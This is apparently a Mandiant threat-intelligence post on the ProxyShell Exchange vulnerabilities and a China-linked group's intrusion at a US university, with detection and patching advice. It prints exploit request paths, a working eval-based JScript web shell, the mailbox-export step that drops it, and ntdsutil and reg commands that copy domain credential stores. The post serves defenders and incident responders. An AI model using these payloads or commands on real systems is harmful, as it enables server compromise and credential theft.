PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers

In August 2021, Mandiant Managed Defense identified and responded to
the exploitation of a chain of vulnerabilities known as ProxyShell.
The ProxyShell vulnerabilities consist of three CVEs
(CVE-2021-34473, CVE-2021-34523, CVE-2021-31207) affecting the
following versions of on-premises Microsoft Exchange Servers.

  • Exchange Server 2013 (Cumulative Update 23 and below)
  • Exchange Server 2016 (Cumulative Update 20 and below)
  • Exchange Server 2019 (Cumulative Update 9 and below)

The vulnerabilities are being tracked in the following CVEs:

CVE

Risk Rating

Access Vector

Exploitability

Ease of Attack

Mandiant Intel

CVE-2021-34473

High

Network

Functional

Easy

Link

CVE-2021-34523

Low

Local

Functional

Easy

Link

CVE-2021-31207

Medium

Network

Functional

Easy

Link

Table 1: List of May & July 2021 Microsoft
Exchange CVEs and FireEye Intel Summaries

Overview

Microsoft Exchange Server provides email and supporting services for
organizations. This solution is used globally, both on-premises and in
the cloud. This chain of vulnerabilities exists in unpatched
on-premises editions of Microsoft Exchange Server only and is being
actively exploited on those servers accessible on the Internet.

Mandiant responded to multiple intrusions impacting a wide variety
of industries including Education, Government, Business services, and
Telecommunications. These organizations are based in the United
States, Europe, and Middle East. However, targeting is almost
certainly broader than directly observed.

One specific targeted attack observed by Mandiant, detailed in this
post, was against a US-based university where UNC2980 exploited
ProxyShell vulnerabilities to gain access to the environment.

The Exploit Chain Explained

ProxyShell refers to a chain of attacks that exploit three different
vulnerabilities affecting on-premises Microsoft Exchange servers to
achieve pre-authenticated remote code execution (RCE). The
exploitation chain was discovered and published
by Orange Tsai (@orange_8361) from the DEVCORE Research Team.

Delivering the Payload

In order to later create a web shell on a Microsoft Exchange server
by exporting from a mailbox, an attacker first needs to create an
email item within a mailbox. In the Metasploit implementation of the
attack, the Autodiscover service is abused to leak a known user’s
distinguished name (DN), which is an address format used internally
within Microsoft Exchange. The Messaging Application Programming
Interface (MAPI) is then leveraged to leak the user’s security
identifier (SID), by passing the previously leaked DN as a request.
The SID is then used to forge an access token to communicate with
Exchange Web Services (EWS).

With the attacker able to successfully impersonate the target user
with a valid access token, they can perform EWS operations. To
continue with the ProxyShell attack, the operation  ‘CreateItem’ is
used, which allows the remote creation of email messages in the
impersonated user’s mailbox. While responding, Mandiant has seen draft
emails with attached web shells, encoded in such a way that they
become decoded upon export to PST later in the attack (specifically
with permutative encoding).

Emails may also be placed in targeted users’ mailboxes via SMTP, as
was suggested in Orange Tsai’s documentation of the attack.

CVE-2021-34473 — Pre-auth Path Confusion Leads to ACL Bypass

Microsoft Exchange has a feature called ‘Explicit Logon’, which
legitimately allows users to open another user’s mailbox or calendar
in a new browser window by providing the mailbox address in the URL.
The feature was designed to only provide access where ‘Full Access’ is
granted to the user, and the target mailbox or calendar is configured
to publish. Exchange is designed to normalize the specified mailbox
address in the URL to identify the target.

The vulnerability exists in passing the string
Autodiscover/Autodiscover.json to the email field in the URL. By
passing that string, Exchange does not perform sufficient checks on
the address, and through its normalization process, this leads to
arbitrary access to backend URLs as NT AUTHORITY/SYSTEM.

GET
/autodiscover/autodiscover.json?@evil.corp/?&Email=autodiscover/autodiscover.json%3F@evil.corp

GET
/autodiscover/autodiscover.json?@evil.corp/ews/exchange.asmx?&Email=autodiscover/autodiscover.json%3F@evil.corp

POST
/autodiscover/autodiscover.json?@evil.corp/autodiscover/autodiscover.xml?&Email=autodiscover/autodiscover.json%3F@evil.corp

POST
/autodiscover/autodiscover.json?@evil.corp/mapi/emsmdb?&Email=autodiscover/autodiscover.json%3F@evil.corp

Figure 1: Requests showing how an attacker can
abuse the normalization process of the Explicit Logon feature

CVE-2021-34523 — Elevation of Privilege on Exchange PowerShell Backend

The Exchange PowerShell Remoting feature, natively built into
Microsoft Exchange, was designed to assist with administrative
activities via the command line. The previous exploit allowed an
attacker to interface with arbitrary backend URLs as NT
AUTHORITY/SYSTEM, however since that user does not have a mailbox, the
attacker cannot directly interface with the PowerShell backend
(/Powershell) at that privilege level.

The PowerShell backend checks for the X-CommonAccessToken header in
incoming requests. If the header does not exist, another method is
used to get a CommonAccessToken. This method checks for the X-Rps-CAT
parameter in the incoming request, and if present, deserializes this
to a valid CommonAccessToken. With the previously collected
information on the target mailbox or default information from built-in
mailboxes, passing of a valid X-Rps-CAT value is trivial.

By passing this value to the PowerShell backend with the previously
successful access token, an attacker can downgrade from the NT
AUTHORITY/SYSTEM account to the target user. This user must have local
administrative privileges in order to execute arbitrary Exchange
PowerShell commands.

POST
/autodiscover/autodiscover.json?a=abcde@evil.com/powershell/?X-Rps-CAT=[Base64
encoded data]

Figure 2: This request uses the parameter
X-Rps-CAT, which allows valid user impersonation

CVE-2021-31207 — Post-auth Arbitrary-File-Write Leads to RCE

Once the two previous vulnerabilities are exploited successfully,
the vulnerability CVE-2021-31207 allows the attacker to write files.
As soon as the attacker is able to execute arbitrary PowerShell
commands, and the required ‘Import Export Mailbox’ role is assigned to
the impersonated user (which can be achieved by execution of the
New-ManagementRoleAssignment cmdlet), the cmdlet
New-MailboxExportRequest can be used to export a user’s mailbox to a
specific desired path e.g.

New-MailBoxExportRequest – Mailbox
john.doe@enterprise.corp -FilePath
\127.0.0.1C$pathtowebshell.aspx

Figure 3: New-MailBoxExportRequest can be used
to export payloads

The use of New-MailboxExportRequest allows the attacker to export
target mailboxes where previously created emails with encoded web
shells were created. The attacker can export the mailbox to a PST file
format with a web file extension, such as ASPX, which allows the
attacker to drop a functional web shell, since the encoded attachments
in the email are decoded upon write to the PST file format. This is
due to the PST file format using permutative encoding, by attaching a
pre-encoded payload, upon export the decoded payload is actually written.

Observations From Investigations

Mandiant responded to intrusions involving ProxyShell exploitation
across a range of customers and industries. Examples of
proof-of-concept (PoC) exploits developed and released publicly by
security researchers could be leveraged by any threat group, leading
to adoption by threat groups with varying levels of sophistication.
Mandiant has observed the exploit chain resulting in post-exploitation
activities, including the deployment of web shells, backdoors, and
tunneling utilities to further compromise victim organizations. As of
the release of this blog post, Mandiant tracks eight UNC
groups
exploiting the ProxyShell vulnerabilities.  Mandiant
anticipates more clusters will be formed as different threat actors
adopt working exploits.

Exploitation

Mandiant has observed the exploitation of Proxyshell starting with
the abuse of Autodiscover services to leak known users distinguished
name (DN) to then leverage it to leak the administrator security
identifier (SID).

By using the leaked DN and SID, the
attacker can create a mailbox that contains a draft email with a
malicious payload as an attachment. Afterwards, the mailbox and the
contained payload are exported to a web-accessible directory or
another directory on the host.

Attempted exploitation of ProxyShell appears to be mostly automated.
In some cases, Mandiant observed only partial attacker success, such
as the creation of items in mailboxes remotely, but not the exporting
of mailboxes and their contained payloads to another directory on the host.

Mandiant has observed a wide range of source IP addresses and user
agents attempting HTTP requests consistent with the first stage of the
ProxyShell exploit chain.

Post-Exploitation

Upon successful exploitation of the vulnerabilities, Mandiant
observed multiple payloads to gain a foothold in the network including
CHINACHOP and BLUEBEAM web shells (see Malware Definitions section).
Follow-on actions include execution of internal reconnaissance
commands on servers, and deployment of tunneler utilities.

PST, Want a Shell? ProxyShell Exploiting Microsoft Exchange Servers

Figure 4: BLUEBEAM ASP web shell that was
embedded into a PST payload

Threat Actor Spotlight: UNC2980

In August 2021, Mandiant Managed Defense responded to an intrusion
leveraging the ProxyShell vulnerability at a US-based university.
Mandiant tracks this threat actor as UNC2980.

UNC2980 is a cluster of threat activity tracked since August 2021
and believed to be conducting cyber espionage operations. Mandiant
suspects this group to be operating from China currently assessed at
low confidence. UNC2980 has been observed exploiting CVE-2021-34473,
CVE-2021-34523, CVE-2021-31207, publicly referred to as
“ProxyShell”, to upload web shells for initial access. The
group relies on multiple publicly available tools including EARTHWORM,
HTRAN, MIMIKATZ, and WMIEXEC post compromise.

UNC2980 in Action

Upon gaining access through the exploitation of ProxyShell and
deploying a web shell, UNC2980 dropped multiple tools into the victim
environment. The following publicly available tools were observed on
the initial compromised host: HTRAN, EARTHWORM, and several MIMIKATZ variants.

<script language=’JScript’
runat=’server’ Page aspcompat=true>function
Page_Load(){eval(Request[‘cmd’],’unsafe’);}</script>

Figure 5: Web shell embedded in PST payload used
by UNC2980

Approximately 11 hours and 44 minutes after the ProxyShell
exploitation, Mandiant observed post-exploitation activity beginning
with multiple Event ID 4648 (A logon was attempted using explicit
credentials) events initiated by the process C:rootmimikatz.exe on
the initial compromised host. All Event ID 4648 events were associated
with two different domain controllers within the environment.

The group then utilized the utility WMIEXEC to conduct
post-exploitation activity. This was primarily observed through the
default redirection of command output used by WMIEXEC.

cmd.exe /c whoami > C:wmi.dll
2>&1

cmd.exe /c quser > C:wmi.dll
2>&1

cmd.exe /c net localgroup administrators
> C:wmi.dll 2>&1

Figure 6: Reconnaissance commands executed via WMICEXEC

UNC2980 was observed utilizing several techniques for credential
theft once access to a host was established. In one instance, after
performing reconnaissance, UNC2980 deployed multiple variants of
MIMIKATZ. In another instance, UNC2980 utilized multiple batch files
which executed ntdsutil to enumerate snapshots of volumes and were
then used to copy ntds.dit and the System hive.

ntdsutil snapshot “List All” quit
quit >>c:temp1.txt

ntdsutil snapshot “unmount
{[GUID]}” quit quit

net localgroup administrators

ntdsutil snapshot “activate instance
ntds” create quit quit

ntdsutil snapshot “delete {[GUID]
}” quit quit

ntdsutil snapshot “mount
{[GUID]}” quit quit

copy
c:$SNAP_[date]_VOLUMEC$windowsntdsntds.dit
c:tempntds.dit

reg save hklmsystem
c:temps.hive

Figure 7: Executed Batch commands

Monitoring and Investigating

Mandiant recommends monitoring or investigating for compromise on
presently or previously vulnerable Exchange servers.

Remote Creation of Items in Mailboxes
  • Monitor or investigate irregular Exchange EWS logs to identify
    CreateItem requests, indicating the remote creation of items.

    • Mandiant has observed draft emails created, containing
      attached encoded web shells, though other items may also be
      created.
    • Examine logs under ‘Program
      FilesMicrosoftExchange ServerV15LoggingEws*’ where:

      • AuthenticatedUser is SYSTEM or a system account
      • SoapAction is CreateItem
      • HttpStatus is 200
        (indicating success)
  • Monitor or identify draft emails with encoded attachments.
    • Mandiant has observed draft emails containing .TXT file
      attachments with encoded content.
Remote Unauthenticated PowerShell
  • Monitor IIS logs for successful POST requests containing
    “/autodiscover/autodiscover.json” &
    “Powershell”.
  • Monitor or investigate the execution
    of the PowerShell cmdlets ‘New-ManagementRoleAssignment’ or
    ‘New-MailboxExportRequest’.

    • Mandiant has observed
      ‘New-ManagementRoleAssignment’ being used to assign mailbox
      import and export permissions to target mailboxes, followed by
      ‘New-MailboxExportRequest’ to export the drafts folder
      containing emails with encoded web shells attached.
    • Examine PowerShell ScriptBlock, transcription, and module
      logging where enabled.
    • Examine logs under ‘Program
      FilesMicrosoftExchange
      ServerV15LoggingCmdletInfraPowershell-ProxyCmdlet*’,
      especially the cmdlet parameters where:

      • AuthenticatedUser is the name of impersonated mailbox
        user
      • ProcessName contains w3wp
      • Cmdlet is
        ‘New-ManagementRoleAssignment’ or
        ‘New-MailboxExportRequest’
    • Mandiant has
      observed the ‘CmdletInfraPowershell-ProxyCmdlet’ logs
      recording remote cmdlets and their parameters even when regular
      PowerShell ScriptBlock/transcription/module logging is not
      enabled.
    • Mandiant recommends review of these logs on
      presently or previously vulnerable servers even in cases where
      no web shell is identified, since attackers may execute any
      PowerShell cmdlet, utilizing only part of the exploit
      chain.
  • Examine the ‘Data’ field in the Audit
    logs stored under ‘Program FilesMicrosoftExchange
    ServerV15LoggingLocalQueueExchange*’. This field contains JSON
    data with the Operation Key value containing the executed PowerShell
    cmdlets.

Creation or Use of Web Shells

  • Monitor or identify .ASPX files created under the path
    inetpubwwwrootaspnet_client written by SYSTEM.
  • Monitor or
    identify PST files (by header ‘!BDN’ / 0x2142444E) with web file
    extensions (commonly .ASPX). These files may be written by
    MSMailboxReplication.exe or w3wp.exe (the latter can be the result
    of replication events due to the exploitation of a different
    Exchange server in the same cluster).
  • Monitor or identify
    files created by MSMailboxReplication.exe with extensions other than
    .PST (this binary is used by the New-MailboxExportRequest PowerShell
    cmdlet).
  • Monitor or identify arbitrary commands spawned by
    the process w3wp.exe.
  • Monitor or investigate the
    ‘MSExchange Management’ Event logs (EID: 1 and EID: 6) to identify
    ‘New-MailboxExportRequest’ requests with .ASPX extensions,
    indicative of a web shell creation attempt.

Additional attempted or successful exploitation may be identified by
analyzing network and IIS logs looking for HTTP requests matching some
of the patterns described in this report.

  • Requests against /autodiscover/autodiscover.json containing
    ‘powershell’, ‘mapi/nspi’, ‘mapi/emsmdb’, ‘/EWS’ or
    ‘X-Rps-CAT’.
  • Status codes 200, 301, or 302 indicating
    successful exploitation.
  • Status codes 400, 401, or 404
    indicating attempted exploitation.

Prevention and Remediation

Mandiant advises all organizations to apply patches KB5003435
(CVE-2021-31207) and KB5001779
(CVE-2021-34473 and CVE-2021-34523) to vulnerable on-premises
Microsoft Exchange servers to mitigate these vulnerabilities being
exploited. To verify the current version of on-premises Microsoft
Exchange running within an organization, reference this Microsoft resource.

If an organization is not able to immediately apply the patches,
inbound TCP/80 and TCP/443 traffic to on-premises Exchange servers
should be explicitly blocked from the Internet.

Additionally, Mandiant recommends organizations review their
detection and response capabilities, especially on public-facing
infrastructure, including:

  • Deploying and configuring a File Integrity Monitoring solution
    to monitor and/or prevent the creation of files, especially on web
    servers outside of maintenance windows
  • Deploying,
    configuring, and monitoring an Endpoint Detection and Response
    solution to alert to and respond to malicious activity
    effectively
  • Enabling enhanced logging and implementing
    sufficient log retention periods to support investigations,
    including:

    • Microsoft Systems Monitor (Sysmon) on Windows
      Servers
    • PowerShell Module, Script Block, and
      Transcription Logging

Detecting the Techniques

Product

Signature

FireEye Endpoint Security

  • PST FILEWRITE WITH ASP
    EXTENSION (METHODOLOGY)
  • W3WP.EXE CHILD PROCESS
    RECON COMMAND (METHODOLOGY)
  • WMICEXEC (FAMILY)

FireEye Network Security

  • Exploit.PY.ProxyShell
  • Microsoft Exchange CVE-2021-34473 Remote Code
    Execution
  • FE_Microsoft Exchange CVE-2021-34473 Remote
    Code Execution

FireEye Email Security

FireEye Detection On Demand

FireEye Malware File
Scanning

FireEye Malware File Storage Scanning

 

  • FEC_Exploit_PY_ProxyShell
  • FE_Hunting_PSTWithEmbeddedWebShell
  • FE_Exploit_PY_ProxyShell

FireEye Helix

  • MICROSOFT EXCHANGE [ProxyShell
    Exploit Attempt]
  • MICROSOFT EXCHANGE [ProxyShell
    Exploit Success]
  • MICROSOFT EXCHANGE [Post-Auth
    Arbitrary-File-Write (CVE-2021-31207) – Mailbox Export]
  • MICROSOFT EXCHANGE [Post-Auth Arbitrary-File-Write
    (CVE-2021-31207) – Certificate Request Export]

Mandiant Security Validation Action

Organizations can validate their security controls using the
following actions with Mandiant Security Validation.

VID

Name

A101-827

 

Application Vulnerability –
CVE-2021- 34473, ProxyShell Vulnerability Check

A101-829

Application Vulnerability – ProxyShell,
Exploitation

A101-839

Malicious File Transfer – ProxyShell WebShell,
Download

Malware Definitions

BLUEBEAM

BLUEBEAM (aka. Godzilla) is a publicly available web shell
management tool written in JAVA. BLUEBEAM can generate web shell
payloads in JSP, ASP[.]NET, and PHP, it also supports AES encryption.

BLUEBEAM contains 20 built-in modules that provide features such as
loading additional web shells into memory, shell execution, mimikatz,
meterpreter, file compression, and privilege escalation.

HTRAN

HTRAN is a publicly available tunneler written in C/C++ that serves
as a proxy between two endpoints specified via command line arguments.

EARTHWORM

EARTHWORM is a publicly available tunneler utility. It is capable of
establishing a tunnel to a SOCKS v5 server and is supported on the
following operating systems: Linux, MacOS, and Arm-Linux.

CHINACHOP

The CHOPPER web shell is a simple code injection web shell that is
capable of executing Microsoft .NET code within HTTP POST commands.
This allows the shell to upload and download files, execute
applications with webserver account permissions, list directory
contents, access Active Directory, access databases, and any other
action allowed by the .NET runtime.

For more detailed analysis, see our blog post on the China
Chopper web shell
.

Acknowledgements

Alex Pennino, Andrew Rector, Harris Ansari and Yash Gupta

By admin